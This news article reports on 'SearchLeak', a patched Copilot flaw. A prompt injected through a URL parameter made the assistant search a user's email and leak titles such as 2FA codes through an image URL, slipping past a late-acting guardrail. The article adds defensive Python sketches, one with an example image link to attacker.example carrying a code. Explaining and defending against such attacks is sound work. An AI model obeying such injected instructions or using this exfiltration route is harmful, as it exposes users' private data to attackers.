Microsoft patches critical Copilot vulnerability after researchers demonstrate 2FA code theft

Microsoft fixed a critical Copilot vulnerability after researchers demonstrated how it could be used to steal 2FA codes from emails. The exploit used a URL parameter to bypass guardrails.


Microsoft patched a critical vulnerability in its M365 Copilot AI platform after researchers revealed how it could be exploited to steal 2FA codes and other sensitive data from emails. The researchers demonstrated a proof-of-concept attack that bypassed security guardrails, allowing attackers to exfiltrate data with no user interaction beyond a single click on a link. The vulnerability, rated at the maximum severity level, critical, highlights ongoing challenges in securing AI-driven systems against malicious commands.

The attack, dubbed SearchLeak, leveraged a technique called Parameter-to-Prompt Injection, in which an attacker sends the victim a URL whose query parameter triggers Copilot’s search functionality. The malicious command instructed Copilot to search the user’s emails, extract their titles, and embed them in an image URL. Once the victim clicked the link, Copilot executed the command without any further input. Researchers noted that Copilot’s guardrail, which wraps output in <code> blocks, only activated after the 'thinking' phase, so the request had already left the browser before the protection kicked in.
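
The timing problem described above can be illustrated with a small defensive sketch. It is not Microsoft's fix, which the report does not detail; it only shows the general idea of filtering image references out of model output before anything is handed to a renderer, so that no request can leave the browser first. The function name sanitize_before_render, the allowlisted host images.example.com, and the placeholder text are all assumptions made for illustration.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist: hosts from which images may be loaded.
ALLOWED_IMAGE_HOSTS = {"images.example.com"}

# Markdown image syntax: ![alt](url "optional title")
MARKDOWN_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")
# Raw HTML image tags are dropped entirely in this sketch.
HTML_IMAGE = re.compile(r"<img\b[^>]*>", re.IGNORECASE)

PLACEHOLDER = "[image removed]"


def is_allowed(url: str) -> bool:
    """Return True only if the URL's host is on the allowlist."""
    host = urlparse(url).hostname or ""
    return host.lower() in ALLOWED_IMAGE_HOSTS


def sanitize_before_render(text: str) -> str:
    """Strip image references that could carry data to an untrusted host.

    Must be called on model output BEFORE it reaches the renderer,
    otherwise the browser may already have fetched the image URL.
    """
    def replace_markdown(match: re.Match) -> str:
        url = match.group(2)
        return match.group(0) if is_allowed(url) else PLACEHOLDER

    text = MARKDOWN_IMAGE.sub(replace_markdown, text)
    return HTML_IMAGE.sub(PLACEHOLDER, text)


if __name__ == "__main__":
    leaky = "Done ![x](https://attacker.example/p.png?d=Your+code+is+123456)"
    print(sanitize_before_render(leaky))
```

The sketch assumes the complete response is available when the filter runs. A streaming interface would need to buffer partial output, since an image reference split across two chunks would slip past a per-chunk check.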


Microsoft and other LLM providers have struggled to prevent their models from complying with malicious requests to reveal data. The root cause is that AI bots cannot distinguish between instructions from the user and instructions embedded in third-party content they summarize or act on. Guardrails, such as restricting access to untrusted sites, are designed to mitigate the risk, but attackers easily circumvent them with workarounds such as markup language or using Bing as a trampoline. Varonis researchers highlighted that the exploit could access emails, meeting invites, notes, and other business content, with the potential to extend further depending on M365 integration.
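
Because the model itself cannot tell trusted instructions from untrusted ones, one commonly discussed mitigation is to track provenance outside the model and gate sensitive actions on it. The following is a minimal sketch of that idea, not a description of how Copilot works: the Segment type, the q parameter name, the copilot.example host, and the tool names search_email and read_calendar are all hypothetical.

```python
from dataclasses import dataclass
from urllib.parse import urlparse, parse_qs

# Hypothetical set of tools that touch private data.
SENSITIVE_TOOLS = {"search_email", "read_calendar"}


@dataclass(frozen=True)
class Segment:
    text: str
    trusted: bool  # True only for text the user typed directly


def segment_from_url(url: str, param: str = "q") -> Segment:
    """Text arriving via a URL query parameter can be set by anyone
    who crafts the link, so it is always marked untrusted."""
    values = parse_qs(urlparse(url).query).get(param, [""])
    return Segment(text=values[0], trusted=False)


def may_invoke_tool(segment: Segment, tool: str) -> bool:
    """Allow sensitive tools only when the triggering text is trusted."""
    return segment.trusted or tool not in SENSITIVE_TOOLS


if __name__ == "__main__":
    seg = segment_from_url("https://copilot.example/chat?q=summarize+my+inbox")
    print(seg.text, may_invoke_tool(seg, "search_email"))
```

A policy like this does not fix the underlying confusion inside the model. It only limits what an untrusted prompt can trigger, and it depends on every input path labeling its text correctly.
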
Source: Ars Technica

Key points

Microsoft patched a critical Copilot vulnerability after researchers demonstrated how it could be used to steal 2FA codes from emails.
Researchers used a URL parameter to trigger Copilot’s search functionality and bypass guardrails.
The attack, named SearchLeak, leveraged a Parameter-to-Prompt Injection technique to exfiltrate data.
Copilot’s guardrail, which wraps output in <code> blocks, only activated after the 'thinking' phase, allowing the request to leave the browser before the protection kicked in.
The exploit could access emails, meeting invites, notes, and other business content, with the potential to extend further depending on M365 integration.
Microsoft and other LLM providers have struggled to prevent their models from complying with malicious requests to reveal data.
Attackers can use workarounds like markup language or Bing as a trampoline to bypass guardrails.


WRITTEN BY

Nadia Rahman

AI Safety, Alignment & Policy

Nadia follows AI safety, alignment, regulation, and the policy debates shaping the field.